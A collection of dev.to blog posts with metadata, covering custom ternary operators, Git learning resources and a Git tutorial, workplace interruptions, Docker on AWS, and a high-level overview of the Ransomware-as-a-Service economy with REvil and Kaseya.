With this modification, the above range-check can be rewritten as follows:
```hs
-- Definition
a <` b `< c = a < b && b < c
-- Usage
print (1 <` 2 `< 3) -- true
print (1 <` 3 `< 2) -- false
```
Thus, the best mechanism that I can think of so far to define ternary operators is as follows:
```hs
a X` b `Y c
-- Where a, b and c are the arguments
-- while X` and `Y together is the name of the ternary operator
```
Also regarding precedence, ternary operators should have
lower precedence than binary operators, for example:
```
(a <` b + c `< d) MEANS (a <` (b + c) `< d)
```
Regarding associativity, I will prefer
right-associativity over left-associativity, since it is
more common in most cases.
Therefore:
```
a X` b `Y c X` d `Y e = a X` b `Y (c X` d `Y e)
```
For example, the conditional ternary operator:
```
true then` b `else c = b
false then` b `else c = c
```
Where:
```
a then` b `else c then` d `else e
```
Should conventionally mean (right-associative):
```
a then` b `else (c then` d `else e)
```
Rather than (left-associative):
```
(a then` b `else c) then` d `else e
```
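As a sanity check of this convention, JavaScript's built-in conditional operator (item 1 in the introduction) already chains right-associatively, which is easy to confirm:

```javascript
// JavaScript's ?: chains right-associatively:
// a ? b : c ? d : e parses as a ? b : (c ? d : e)
const chained    = true ? "b" : false ? "d" : "e";
const rightAssoc = true ? "b" : (false ? "d" : "e");
const leftAssoc  = (true ? "b" : false) ? "d" : "e";

console.log(chained);                // "b"
console.log(chained === rightAssoc); // true  - matches the right grouping
console.log(chained === leftAssoc);  // false - left grouping yields "d"
```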
## Conclusion
Hopefully this article has provided you with some inspiration
on possible mechanisms for user-defined ternary operators.
Thanks for reading.
| wongjiahau |
756,044 | Git Learning Materials | Thanks, Everyone For being part of the series From Git to GitHub. This is the 4th and the last Blog... | 13,451 | 2021-07-11T08:11:04 | https://dev.to/vanshsh/git-learning-materials-1ho2 | github | Thanks, Everyone
For being part of the series ***From Git to GitHub***. This is the 4th and the last **Blog of the series**.
In this blog, I will give you various resources to learn, apply, and read about Git and GitHub.
## Install Git
- [Git](https://git-scm.com/).
## Youtube Playlists to Learn Git
- [The Net Ninja](https://youtu.be/3RjQznt-8kE) .
- [Traversy Media](https://youtu.be/SWYqp7iY_Tc).
- [Tech with Tim](https://youtu.be/SWYqp7iY_Tc).
## Reading Resources
- [Git](https://git-scm.com/).
- [W3School/Git](https://www.w3schools.com/GIT/default.asp) .
- [MDN docs](https://developer.mozilla.org/en-US/docs/Learn/Tools_and_testing/GitHub) .
## Open Source Contribution
- [First contribution ](https://github.com/firstcontributions).
- [Up for Grab](https://up-for-grabs.net/#/).
- [DRY](https://github.com/danthareja/contribute-to-open-source/issues/1).
- [TEAMMATES](https://github.com/TEAMMATES/teammates/contribute) .
## Books
- [Pro Git Book](https://git-scm.com/book/en/v2).
## Cheatsheet
- [Git Cheatsheet](https://gitcheatsheet.org/).
- [Cheathsheet by GitHub](https://education.github.com/git-cheat-sheet-education.pdf).
## Step by Step Method
- [Learn How to use Git](https://www.deployhq.com/git).
**Thanks again** for being part of the series. And don't worry: Git is not as difficult as it seems, and you don't have to learn everything; there are only 10-15 commands that you will use most throughout your life.
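For a taste of those everyday commands, here is a quick sketch of a first session (the repository name and commit message are just examples):

```shell
# A quick tour of the everyday Git commands
git init demo-repo                      # create a new repository
cd demo-repo
git config user.name "Your Name"        # identify yourself for commits
git config user.email "you@example.com"
echo "# Demo" > README.md
git status                              # see what changed
git add README.md                       # stage the change
git commit -m "Initial commit"          # record it in history
git log --oneline                       # browse the history
```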
There are more informative and interesting blogs to come. So stay tuned.
Until then **Keep Learning, Keep Growing**
<h2>Connect with me 👇 </h2>
Twitter|LinkedIn|Gmail|DEV
-------|---------|------|--------
<a href="https://twitter.com/Vanshsh2701" target="_blank"><img src="https://img.icons8.com/clouds/60/000000/twitter.png"/></a>|<a href="https://www.linkedin.com/in/vanshsharma27/" target="_blank"><img src="https://img.icons8.com/bubbles/60/000000/linkedin.png"/></a>|<a href="mailto:vanshsharma9354@gmail.com" target="_blank"><img src="https://img.icons8.com/clouds/60/000000/gmail.png"/></a>|<a href ="https://dev.to/vanshsh" target="_blank"><img src="https://img.icons8.com/office/50/000000/blog.png"/></a>
| vanshsh |
756,160 | Toward solving interruption in Programming | Recently there are developers and creative vocal about how interruption ruin their work. There are... | 0 | 2021-07-11T10:44:07 | https://chrisza.me/interruption-attitude/ |  | Recently, developers and creatives have been vocal about how interruptions ruin their work.
There are many articles about the [flow state](https://www.bbc.com/worklife/article/20190204-how-to-find-your-flow-state-to-be-peak-creative) and a [funny cartoon](https://heeris.id.au/2013/this-is-why-you-shouldnt-interrupt-a-programmer/) on how interruptions ruin serious thinking work. There is even a [passive-aggressive piece](https://daedtech.com/programmers-teach-non-geeks-the-true-cost-of-interruptions/) about teaching non-geeks the cost of interruptions.
As a developer, while I agree that interruptions can ruin work to some degree (which differs from person to person), I don't think the passive-aggressive stance most programmers take is productive or helpful.
First of all, based on my experience in many companies as a full-time developer, a manager and a consultant, I want to say this out loud:
**No one really want to interrupt your work**
There is no conspiracy where every non-geek role held a secret meeting to figure out how to make programmer life most miserable and decide that throwing non-sense interruptions every hour is the best course of action.
No, that is not the case.
Every interruption has its own reason. Your teammate has some problem they want to solve, and they think you can help.
That's why they come to you. So tell people to stop interrupting will not work, especially if the problem is a shared problem. For example, what happens if sales are about to commit to some scope but don't know the feasibility? Would you want sales to stop interrupting the programmer and figure this out on their own? That obviously will make the matter worse.
There are some necessary interruptions and some not. You cannot just tell people to leave you alone to solve the problem. After all, you don't get paid to solve your personal problem. It is always a shared problem. Everyone in the team is at stake. Cutting interruptions and work in a silo is not a solution.
I believe the solution is to let them know how to interact with you. You have to set your own boundary.
For example, you can say if anything urgent, please call me instead of a message. You can say that if you leave a message, I will read it within a day. If you ping me directly, I will respond every hour. You can also block your flow time on the calendar.
Those are all valid boundaries to set.
And at first, people might mistake the urgency of a situation. Some people might call you about a tiny issue they have. That is fine the first time it happens: take the opportunity to categorize the issue, and tell them that next time, this type of issue is not as urgent as they might think. If it happens repeatedly, the team has to talk about urgency and tradeoffs, since interruptions have a cost.
In short, rather than complaining about how others are wrong, it's better to tell what's right. We should let others know how to interact with us productively.
And there might be some constraints that we don't know about. For example, we might be legally bound to report production issues within a specific amount of time. We can work together to solve that constraint.
But first, you need to believe that people are not out there to get you. As I said, there is no conspiracy of non-geeks. Everyone, geeks or non-geeks, just wants to get the best results. We might have a different opinion on how to get it. That's true. They have a reason, strong or weak, they have a reason.
And shutting others out is not going to solve anything. It is a bad stance to take on the interruption problem. It is much better to take the stance of
**I understand why you need to interrupt me. However, this is not productive for all of us. Can we do it differently?**
And that is my rant for today.
| chrisza4 | |
756,172 | Master Git in 7 minutes | Essentially, Git keeps tabs on text changes, but the definition is a version control system. Chances... | 0 | 2021-07-11T12:27:30 | https://valeriavg.dev/master-git-in-7-minutes/ | beginners, git, tutorial, webdev | Essentially, Git keeps tabs on text changes, but the definition is a version control system. Chances are you've already used git one way or another: it is a de-facto standard for code versioning due to its distributed nature, as opposed to the centralised Apache Subversion (SVN).
## Installing Git
To check if you have Git installed run in your terminal:
```sh
git version
# git version 2.30.1 (Apple Git-130)
```
If you don't have it, follow instructions on [https://git-scm.com/downloads](https://git-scm.com/downloads). Mac users can install it with brew: `brew install git`
## Configuring Git
There are just a few things we want to configure:
```sh
git config --global user.name "John Doe" && # your name
git config --global user.email johndoe@example.com && # your email
git config --global init.defaultbranch main # default branch name, to be compatible with GitHub
```
You can see current global configuration with:
```sh
git config --global --list
# Type ":q" to close
```
Git stores configuration in plain text and, if you prefer, you can edit global configuration directly in `~/.gitconfig` or `~/.config/git/config`.
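As an illustrative sketch (using the placeholder name and email from above), the resulting `~/.gitconfig` would look roughly like:

```ini
[user]
	name = John Doe
	email = johndoe@example.com
[init]
	defaultBranch = main
```

Section names and keys are case-insensitive, so the exact capitalization git writes may differ.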
As the command suggests, removing `--global` would make these commands scoped to the current folder. But to test that out we need a repository.
## Creating new repository
A repository is just a folder with all the stuff you want to track. To create one run:
```sh
mkdir gitexample &&
cd gitexample &&
git init
# gitexample git:(main)
```
This command creates a folder `.git` inside `gitexample` folder. That hidden `.git` folder is what makes a repository: all local configuration and changes are stored there.
## Making changes
Let's create something in the repository:
```sh
echo "Hello, Git" >> hello.txt
```
If we run `git status`, we'll see the newly created untracked file:
```sh
git status
# On branch main
#
# No commits yet
#
# Untracked files:
# (use "git add <file>..." to include in what will be committed)
# hello.txt
#
# nothing added to commit but untracked files present (use "git add" to track)
```
As the output suggests, let's add the file. It can be done directly with:
```sh
git add . # Or `git add hello.txt`, if we don't want all files
```
If you check on the repository status now, you'll see that the file is added (aka *staged*), but not yet committed:
```sh
git status
# On branch main
#
# No commits yet
#
# Changes to be committed:
# (use "git rm --cached <file>..." to unstage)
# new file: hello.txt
```
To record the changes, let's commit them:
```sh
git commit -m "Add hello.txt"
# [main (root-commit) a07ee27] Adds hello.txt
# 1 file changed, 2 insertions(+)
# create mode 100644 hello.txt
```
Pro tip: `git commit -m <MESSAGE>` is a shorthand command; you can use `git commit` to open an editor (usually Vim) and provide a detailed commit description instead.
Let's check the changes with:
```sh
git log
# type :q to close
```
It will show something like:
```sh
commit a07ee270d6bd0419a50d1936ad89b9de0332f375 (HEAD -> main)
Author: Your Name <your@email.address>
Date: Sun Jul 11 11:47:16 2021 +0200
Adds hello.txt
(END)
```
## Creating branches
Having a separate version of the initial code can be useful in a lot of situations: e.g., when testing out a feature you're unsure about, or for avoiding code conflicts when working together. That's exactly what a git branch is: it grows from a particular point in history.
To create a branch run `git branch NAME` and to switch branch run `git checkout NAME`. Or simply:
```sh
git checkout -b dev # switches to a new branch called "dev"
# Switched to a new branch 'dev'
# gitexample git:(dev)
```
Let's change something in the `hello.txt` file and commit the changes:
```sh
echo "\nHello, Git Branch" >> hello.txt &&
git commit -am "Change hello.txt"
```
Now let's switch back to main version:
```sh
git checkout main &&
cat hello.txt
# Switched to branch 'main'
# Hello, Git
```
As you can see, the file contents are still the same as they were. To compare branches we can run:
```sh
git diff dev
# diff --git a/hello.txt b/hello.txt
# index 360c923..b7aec52 100644
# --- a/hello.txt
# +++ b/hello.txt
# @@ -1,3 +1 @@
# Hello, Git
# -
# -Hello, Git Branch
# (END)
# type ":q" to close
```
Let's make changes in main branch as well:
```sh
echo "\nHi from Main Branch" >> hello.txt &&
git commit -am "Change hello.txt from main"
# [main 9b60c4b] Change hello.txt from main
# 1 file changed, 2 insertions(+)
```
Now let's try to combine the changes:
```sh
git merge dev
# Auto-merging hello.txt
# CONFLICT (content): Merge conflict in hello.txt
# Automatic merge failed; fix conflicts and then commit the result.
```
Because the file was changed in the same place twice we got a conflict. Look at the file:
```sh
cat hello.txt
<<<<<<< HEAD
Hello, Git
Hi from Main Branch
=======
Hello, Git
>>>>>>> dev
```
There is also a tool to see changes separately:
```sh
git diff --ours # :q to close
git diff --theirs #:q to close
```
You can manually edit the file and commit the changes, but let's imagine we only want one of the versions. We'll start with aborting merge:
```sh
git merge --abort
```
And restarting merge with "theirs" strategy, meaning that in case of conflict we'll use whatever incoming branch insists on:
```sh
git merge -X theirs dev
# Auto-merging hello.txt
# Merge made by the 'recursive' strategy.
# hello.txt | 5 +----
# 1 file changed, 1 insertion(+), 4 deletions(-)
```
The opposite to this strategy is "ours". Merging both changes together will require manual editing (or use of `git mergetool`).
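As a sketch of that manual route (a throwaway repository in a temp directory; file contents are purely illustrative), conflicts can also be resolved file by file with `git checkout --ours`/`--theirs` during a merge:

```sh
set -e
tmp=$(mktemp -d) && cd "$tmp"
git init -q .
git config user.email you@example.com && git config user.name "You"
echo base > hello.txt && git add . && git commit -q -m base
git branch -M main                  # make sure the branch is called main
git checkout -q -b dev
echo dev > hello.txt && git commit -q -a -m dev
git checkout -q main
echo main > hello.txt && git commit -q -a -m main
git merge dev || true               # conflict expected
git checkout --theirs hello.txt     # keep dev's version of this file only
git add hello.txt && git commit -q -m "merge, keeping dev's hello.txt"
cat hello.txt                       # now contains dev's version
```

Unlike `-X theirs`, which applies the strategy to every conflict in the merge, this resolves a single file at a time.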
To see a list of all branches, run:
```sh
git branch # type :q to close
# dev
# * main
```
Finally, to delete the branch run:
```sh
git branch -d dev
# Deleted branch dev (was 6259828).
```
## Rebasing branches
Branches "grow" from a particular point in git history; *rebase* allows you to change that point. Let's create another branch and add a new file this time:
```sh
git checkout -b story &&
echo "Once upon a time there was a file">>story.txt &&
git add story.txt &&
git commit -m "Add story.txt"
# Switched to a new branch 'story'
# [story eb996b8] Add story.txt
# 1 file changed, 1 insertion(+)
# create mode 100644 story.txt
```
Now, let's come back to the main branch and add changes there:
```sh
git checkout main &&
echo "Other changes" >> changes.txt &&
git add changes.txt &&
git commit -m "Add changes.txt"
```
To replay the changes we made in `main` to `story` branch run:
```sh
git checkout story &&
git rebase main
# Successfully rebased and updated refs/heads/story.
```
You can see that the new file created in the `main` branch is now present in the `story` branch:
```sh
ls
# changes.txt hello.txt story.txt
```
Word of caution: do not rebase branches that someone else might have used, e.g. the main branch. Also, keep in mind that every history manipulation on a remote repository will require forcing these changes to take effect.
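To see why forcing becomes necessary, here is a small self-contained sketch (a throwaway repository in a temp directory; all names are illustrative) showing that rebase rewrites commit IDs:

```sh
set -e
tmp=$(mktemp -d) && cd "$tmp"
git init -q .
git config user.email you@example.com && git config user.name "You"
echo base > base.txt && git add . && git commit -q -m "base"
git branch -M main
git checkout -q -b feature
echo feature > feature.txt && git add . && git commit -q -m "feature work"
before=$(git rev-parse feature)
git checkout -q main
echo more > main.txt && git add . && git commit -q -m "main moves on"
git checkout -q feature
git rebase -q main                 # replay "feature work" on top of main
after=$(git rev-parse feature)
[ "$before" != "$after" ] && echo "feature history was rewritten"
```

Because the commit IDs change, a plain `git push` of an already-pushed branch is rejected after a rebase; `git push --force-with-lease origin feature` is the safer way to overwrite the remote, as it fails if someone else pushed in the meantime.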
## Remote repository
If you haven't yet, create a [GitHub](https://github.com/signup) account, login and create a [new empty repository](https://github.com/new) (private or public).
Assuming the repository name was "example", run the following command (change USERNAME to your GitHub username):
```sh
git remote add origin git@github.com:USERNAME/example.git &&
git push -u origin main
```
You can refresh the page and see files in main branch. To push all local branches to remote repository run:
```sh
git push --all origin
```
Let's edit something on GitHub: just click any file and the pencil icon. Add a line with any text you want and press "Commit changes".
Now run this command locally to get the remote changes:
```sh
git checkout main &&
git pull
```
## Managing uncommitted changes
If you want to save your local changes for later you can use `git stash`:
```sh
echo "Changes" >> hello.txt &&
git stash
```
Now you can use the following commands to check, apply or discard these changes:
```sh
git stash list
# stash@{0}: WIP on main: 92354c8 Update changes.txt
git stash pop # to apply changes
git stash drop # to drop changes
```
Pro tip: you can use stash number, i.e. `git stash pop 0` to apply a particular stash or `git stash drop 0` to drop it.
If you want to discard all local changes and simply restore repository to last committed changes run:
```sh
git restore .
```
## Managing committed changes
Once you create a commit, this change is saved in local git history. As mentioned before, all changes affecting remote history would require a `git push --force`. Keep it in mind for all following commands.
Let's start with editing the last commit message :
```sh
git commit --amend # type :wq to save and close
# Press "i" to edit, "Esc" to stop editing
```
How about we reset everything to the very beginning?
To find the ID of the very first commit run this command and scroll (with arrow down) to the very end:
```sh
git log --abbrev-commit
# commit a07ee27
# Author: Your Name <your@email.address>
# Date: Sun Jul 11 11:47:16 2021 +0200
#
# Adds hello.txt
# (END)
# type ":q" to close
```
Now run this to reset the repository, but keep all changes unstaged:
```sh
git reset --soft COMMIT # e.g. a07ee27
```
In contrast, you can also make a hard reset and get rid of all the changes with `git reset --hard COMMIT`. There are several other types of reset that you can learn about from the [git documentation](https://git-scm.com/docs/git-reset).
## Aliases
Most of the time you'll be using just a handful of commands (mostly checkout, add, commit, pull, push and merge), but there are some things you might want to have around just in case.
One way to store those is git aliases. To configure an alias, just set it in the config. For example, one alias I use a lot is `git tree`; it prints a nice history log in the form of a tree:
```sh
git config --global alias.tree 'log --graph --decorate --pretty=oneline --abbrev-commit'
# Try it with `git tree`
```
Another useful alias deletes all merged branches:
```sh
git config --global alias.clbr '!git branch --merged | grep -v \* | xargs git branch -D'
```
As you can see it's prefixed with "!", which allows us to use any command, not only git commands.
That's all for today, hope it helps in your developer journey. As always, feel free to share your thoughts and feedback in the comments. Till the next time!
| valeriavg |
756,348 | Docker On AWS | AWS Whitepaper Summary | This content is the summary of the AWS whitepaper entitled “ Docker on AWS “ written by Brandon... | 0 | 2021-07-11T15:54:16 | https://dev.to/awsmenacommunity/docker-on-aws-nji | docker, aws, containers, cloudskills | This content is a summary of the AWS whitepaper entitled “Docker on AWS”, written by Brandon Chavis and Thomas Jones. It discusses how to exploit the benefits of containers on AWS. I have tried to simplify and gather the most interesting points from each paragraph, in order to give readers brief and effective content.
**PS**: Although the introduction is often skipped by many readers, I found that the authors provided an excellent set of information as an opening to our subject. This is why I summarized the introduction as well, with an explanatory figure.

# I. Container Benefits:
The benefits of containers reach all parts of an organization:
**Speed**: Helps all contributors to software development activities act quickly.
**Because:**
1. The architecture of containers allows for full process isolation by using Linux kernel namespaces and cgroups. Containers are independent and share the kernel of the host OS (no need for full virtualization or a hypervisor).
2. Containers can be created quickly thanks to their modular and lightweight nature. This is most noticeable in the development lifecycle. This granularity allows easy versioning of released applications, and it reduces resource sharing between application components, which minimizes compatibility issues.
**Consistency**: Highlighted by the ability to relocate entire development environments by moving a container between systems.
Containers provide predictable, consistent and stable applications in all stages of their lifecycle (development, test and production), because a container encapsulates exact dependencies, thus minimizing the risk of bugs.
**Density and Resource Efficiency**: The community's enormous support for the Docker project has increased the density and modularity of computing resources.
• Containers increase the efficiency and agility of applications thanks to abstraction from the OS and hardware. Multiple containers run on a single system.
• You can balance the resources containers need against the hardware limits of the host to reach the maximum number of containers: higher density increases the efficiency of computing resources, saves money on excess capacity, and lets you change the number of containers assigned to a host instead of scaling horizontally to reach optimal utilization.
**Flexibility:** Based on Docker's portability, ease of deployment, and small size.
• Unlike other applications that require intensive installation instructions, Docker provides (just like Git) a simple mechanism to download and install containers and the applications inside them, using this command:
$ docker pull
• Docker provides a standard interface: it is easy to deploy wherever you like, and it is portable between different versions of Linux.
• Containers make microservice architectures possible, where services are isolated from adjacent services' failures and from errant patches or upgrades.
• Docker provides a clean, reproducible and modular environment.
# II. Containers in AWS:
There are two ways to deploy containers in AWS:
**AWS Elastic Beanstalk:** It is a management layer for AWS services like Amazon EC2, Amazon RDS and ELB.
• It is used to deploy, manage and scale containerized applications
• It can deploy containerized applications to Amazon ECS
• After you specify your requirements (memory, CPU, ports, etc.), it places your containers across your cluster and monitors their health.
• The command-line utility eb can be used to manage AWS Elastic Beanstalk and Docker containers.
• It is used for deploying a limited number of containers
**Amazon EC2 Container Service**
• Amazon ECS is a high-performance management system for Docker containers on AWS.
• It helps launch, manage and run distributed applications, and orchestrate thousands of Linux containers on a managed cluster of EC2 instances, without having to build your own cluster-management backend.
• It offers multiple ways to manage container scheduling, supporting various applications.
• The Amazon ECS container agent is open source and free; it can be built into any AMI to be used with Amazon ECS.
• On a cluster, a task definition is required to define each Docker image (name, location, allocated resources, etc.).
• The minimum unit of work in Amazon ECS is a *task*, which is a running instance of a task definition.
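As an illustrative sketch (the family, names and values here are made up, not taken from the whitepaper), a minimal task definition passed to `aws ecs register-task-definition` might look like:

```json
{
  "family": "webserver",
  "containerDefinitions": [
    {
      "name": "nginx",
      "image": "nginx:latest",
      "cpu": 256,
      "memory": 128,
      "essential": true,
      "portMappings": [{ "containerPort": 80, "hostPort": 80 }]
    }
  ]
}
```

Running a task from this definition then launches the NGINX container with the declared CPU, memory and port mapping on an instance in the cluster.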
**About the clusters in this context:**
• Clusters are EC2 instances running the ECS container agent (which communicates instance and container state information to the cluster manager) and dockerd.
• Instances register with the default or specified cluster.
• A cluster has an Auto Scaling group to satisfy the needs of the container workloads.
• Amazon ECS allows managing a large cluster of instances and containers programmatically.
**Container-Enabled AMIs:** The Amazon ECS-Optimized Amazon Linux AMI includes the Amazon ECS container agent (running inside a Docker container) and dockerd (the Docker daemon), and removes packages that are not required.
**Container Management:**
Amazon ECS provides optimal control and visibility over containers, clusters, and applications with a simple, detailed API. You just need to call the relevant actions to carry out your management tasks.
Here is a list containing examples of available API Operations for Amazon ECS.

**Scheduling**
• Scheduling ensures that an appropriate number of tasks is constantly running, that tasks are registered against one or more load balancers, and that tasks are rescheduled when they fail.
• Amazon ECS API actions like StartTask can make appropriate placement decisions based on specific parameters (StartTask decisions are based on business and application requirements).
• Amazon ECS allows the integration with custom or third-party schedulers.
• Amazon ECS includes two built-in schedulers:
1. **The RunTask:** randomly distributes tasks across your cluster.
2. **CreateService:** ideally suited to long-running stateless services.
**Container Repositories**
• Amazon ECS is repository-agnostic so customers can use the repositories of their choice.
• Amazon ECS can integrate with private Docker repositories running in AWS or an on-premises data center.
**Logging and Monitoring**
Amazon ECS supports monitoring of cluster contents with Amazon CloudWatch.
**Storage**
• Amazon ECS allows to store and share information between multiple containers using data volumes. They can be shared on a host as:
•• Empty, non-persistent scratch space for containers
OR
•• Exported volume from one container to be mounted by other containers on mountpoints called containerPaths.
• ECS task definitions can refer to storage locations (instance storage or EBS volumes) on the host as data volumes. The optional parameter referencing a directory on the underlying host is called sourcePath. If it is not provided, the data volume is treated as scratch space.
• The volumesFrom parameter defines the storage relationship between two containers. It requires a sourceContainer argument to specify which container's data volumes should be mounted.
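A sketch tying these parameters together (container names, images and paths are illustrative, not from the whitepaper): a task definition that mounts a host directory into one container and re-exports that container's volumes to another could look like:

```json
{
  "family": "shared-storage-example",
  "volumes": [
    { "name": "shared-data", "host": { "sourcePath": "/ecs/shared-data" } }
  ],
  "containerDefinitions": [
    {
      "name": "writer",
      "image": "busybox",
      "memory": 64,
      "essential": true,
      "mountPoints": [
        { "sourceVolume": "shared-data", "containerPath": "/data" }
      ]
    },
    {
      "name": "reader",
      "image": "busybox",
      "memory": 64,
      "essential": true,
      "volumesFrom": [{ "sourceContainer": "writer" }]
    }
  ]
}
```

Omitting the `host` block from the volume would instead give the containers empty, non-persistent scratch space.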
**Networking**
• Amazon ECS allows networking features (port mapping, container linking, security groups, IP addresses and resources, network interfaces, etc.).
# III. Container Security
• AWS customers combine software capabilities (Docker, SELinux, iptables, etc.) with AWS security measures (IAM, security groups, NACLs, VPCs) provided in the AWS architecture for EC2 and scaled by clusters.
• AWS customers maintain, control and configure the EC2 instances, OS and Docker daemon through AWS deployment & management services.
• Security measures are scaled through clusters.
# IV. Container Use Cases
**1. Batch jobs**
Containers can package batch, extract, transform, and load jobs and deploy them into clusters. Jobs then start quickly and better performance is achieved.
**2. Distributed Applications**
Containers build:
• Distributed applications, which provide loose coupling and an elastic, scalable design. They are quick to deploy across heterogeneous servers, as they are characterized by density, consistency and flexibility.
• Microservices packaged into adequate encapsulation units.
• Batch job processes which can run on a large number of containers.
**3. Continuous Integration and Deployment**
Containers are a keystone component of continuous integration (CI) and continuous deployment (CD) workflows. They support streamlined build, test, and deployment from the same container images, leveraging CI features in tools like GitHub, Jenkins, and Docker Hub.
**4. Platform as a Service**
PaaS is a service model that provides a set of software, tools and underlying infrastructure, where the cloud provider manages networking, storage, OS and middleware, and the customer performs resource configuration.
**The issue:** Users and their resources need to be isolated. This is a challenging task for PaaS providers.
**The solution:** Containers provide the needed isolation. They also allow creating and deploying template resources to simplify the isolation process.
Also, each product offered by the PaaS provider can be built into its own container and deployed quickly on demand.
# V. Architectural Considerations
All the containers defined in a task are placed onto a single instance in the cluster. So a task represents an application with multiple tiers requiring inter-container communication.
Tasks give users the ability to allocate resources to containers, so containers can be evaluated on resource requirements and collocated.
Amazon ECS provides three API actions for placing containers onto hosts:
**StartTask:** allows a specific cluster instance to be passed as a value in the API call
**RunTask:** uses Amazon ECS scheduler logic to place a task on an open host
**CreateService:** allows for the creation of a Service object, which is a combination of a TaskDefinition object and an existing Elastic Load Balancing load balancer.
**Service discovery:** Solves challenges with advertising internal container state, such as current IP address and application status, to other containers running on separate hosts within the cluster. The Amazon ECS describe API actions like describe-service can serve as primitives for service discovery functionality.
# VI. Walkthrough
Since the commands used in this walkthrough can be reused in other, more complex projects, I suggest a bash file that can help solve repetitive and difficult real-world problems:
View: [link](https://github.com/DorraBoukari/Walkthrough/blob/main/walkthrough.sh)
1. Create your first cluster, named ‘Walkthrough’, with the `create-cluster` command.
PS: each AWS account is limited to two clusters.
2. Add instances.
If you would like to control which cluster the instances register to (instead of the default cluster), you need to provide UserData that populates the cluster name into the `/etc/ecs/ecs.config` file.
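A minimal UserData script for this (using the cluster name from this walkthrough) could be:

```sh
#!/bin/bash
# Runs as EC2 instance user data at first boot: register this
# instance with the "Walkthrough" cluster instead of "default".
echo ECS_CLUSTER=Walkthrough >> /etc/ecs/ecs.config
```

`ECS_CLUSTER` is the agent configuration variable the ECS container agent reads at startup.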
In this lab, we will launch a web server, so we configure the correct security group permissions and allow inbound access from anywhere on port 80.
3. Run a quick check with the `list-container-instances` command.
PS: To dig into the instances more, use the `describe-container-instances` command.
4. Register a task definition before running it on the ECS cluster:
a) Create the task definition:
It is created as a JSON file called ‘nginx_task.json’. This specific task launches a pre-configured NGINX container from the Docker Hub repository.
View: [link](https://github.com/DorraBoukari/Walkthrough/blob/main/nginx_task.json)
b) Register the task definition with Amazon ECS.
5. Run the task with the `run-task` command.
PS:
• Take note of the taskDefinition value (Walkthrough:1) returned after task registration in the previous step.
• To obtain the ARN, use the `aws ecs list-task-definitions` command.
6. Test the container: the container port is mapped to instance port 80, so you can use the curl utility to test the public IP address.
# Conclusion
This whitepaper summary can be a useful resource for those interested in cloud-native technologies. It sheds light on containers generally, and Docker on AWS specifically. It details the benefits of these technologies, especially when using an EC2 cluster, gives a step-by-step guide for beginners to deploy their first container on a cluster, and provides a bash script that helps automate those tasks in more complex projects.
| dorraelboukari |
756,648 | Connecting RaaS, REvil, Kaseya and your security posture | Ransomware is an epidemic that adversely affects the lives of both individuals and large companies,... | 0 | 2021-07-12T14:40:36 | https://blog.shiftleft.io/connecting-raas-revil-kaseya-and-your-security-posture-3ca854cd4646 | vulnerability, cybersecurity, ransomware | ---
title: Connecting RaaS, REvil, Kaseya and your security posture
published: true
date: 2021-07-11 21:25:04 UTC
tags: vulnerability,cybersecurity,ransomware
canonical_url: https://blog.shiftleft.io/connecting-raas-revil-kaseya-and-your-security-posture-3ca854cd4646
---
Ransomware is an epidemic that adversely affects the lives of both individuals and large companies, where criminals demand payments to release infected digital assets.
In the wake of the ransomware success, **Ransomware-as-a-Service (RaaS)** is being offered as a franchise model that allows people without programming skills to become active attackers and take part in the ransomware economy. This is a way of democratizing crime, giving ordinary people and smaller players an easier way into the criminal market, while reducing the risk of exposure for the ones on top of the value chain. For instance, a dissatisfied employee might decide to partner up with a RaaS developer to effectively infect an organization from the inside and then splitting the profit.
> **Wait a minute, this sounds like SaaS (Software as a Service) with the exception of mal-intent and ‘R’ prefix instead of ‘S’ ?**
Yes, these organized cybercrime groups have been known to offer 24/7 technical support, subscriptions, quality assurance, affiliate schemes, and online forums just like legitimate SaaS companies. They know that offering a quality service to their (admittedly) criminally-minded clients will help both sides of the venture to become wealthy at the expense of victimized individuals or organizations that they prey upon.
> **What led to the inception of RaaS ?**
The first ransomware, known as [AIDS](https://en.wikipedia.org/wiki/AIDS_(Trojan_horse)) (**Aids Info Disk** or **PC Cyborg Trojan**), was observed in the wild as early as 1989, spreading through the exchange of floppy disks. After AIDS, the number of ransomware families remained quite low for more than two decades, especially ones with sophisticated destructive capabilities. However, this all changed with the advent of **stronger encryption schemes** in ransomware code and especially the **availability of cryptocurrency as a payment method**, which is fairly difficult for law enforcement to track. In the wake of ransomware's success, **_ransomware-as-a-service_ (RaaS)** has become an entry point for criminals with little programming skill to participate and earn money from ransomware.
> **Is there an underpinning supply-chain that benefits a RaaS provider?**
Contacting ransomware service providers using dark-net markets, prospective and existing criminal networks can cheaply obtain tailor-made ransomware ready to be used on their prospective victims. In addition to the creation fee, the service providers may take a 20–30% revenue share of the ransom as well.
RaaS can have different delivery formats,
- such as source code that the buyer compiles themselves,
- pre-compiled binaries or an interactive interface where the buyer inputs information about the victims.
- Quality testing weaponized source code or pre-compiled binaries to ensure that it operates as expected (_usually tested on low-risk victims_)
This collaborative strategy is a way of achieving a faster rate of infections with a lower risk of getting caught.
> **Who are the stakeholders in such a ransomware based supply chain?**
The stakeholders involved in the underground economy have different responsibilities and expose themselves to different types of risks. Studies of this economy have defined several roles, including
- _virus writers (developers),_
- _website masters/crackers,_
- _envelope_ (account) _stealers,_
- _virtual asset stealers/brokers_ and
- _sellers and players_ (buyers)
- _mixers and tumblers_ (money laundering post-transaction)
> **What is the economics of such an attack from offender and victim’s point of view?**
Similar to a SaaS pricing and distribution model, a victim is profiled and targeted based on their business domain, market share, the clients they serve and their WTPR (willingness to pay ransom). The price of a single ransomware attack can be fixed or discriminated based on several factors (e.g., the complexity of the vulnerability the malware exploits).
> **Who is REvil and why are they relevant to this conversation?**
REvil (_also known as Sodin and Sodinokibi_) is a ransomware-as-a-service (RaaS) enterprise that first came to prominence in April 2019. Their claim to fame is based on their tactics and techniques, which include, but are not limited to:
- Their ideal victim profile (_like an ideal customer profile in SaaS_) ranges from home users to Fortune 500 companies
- They are known to successfully extort far larger payments from large corporate companies
- They execute a methodical workflow to exfiltrate data prior to encrypting it for ransom (_applying additional pressure by threatening to leak the data if the victim chooses to restore from backup and not pay_)
- Yes, REvil has its own web presence (a website) and often releases/updates a so-called “Happy Blog” listing their victims, samples of exfiltrated data and a “trial” decryption of a sample subset as proof of decryption (this almost sounds like a SaaS activation, acquisition and retention funnel)
- A countdown timer is often pinned to a victim’s profile in order to pressure a response/payment.
> **Who is Kaseya and why are they relevant to this conversation?**
[Kaseya](https://www.kaseya.com/) sells unified IT monitoring & management software for MSPs (Managed Service Providers) and IT teams (multi- and single-site). The MSPs in turn sell monitoring and management services to their customers. Let’s visualize the supply-chain distribution of Kaseya software:

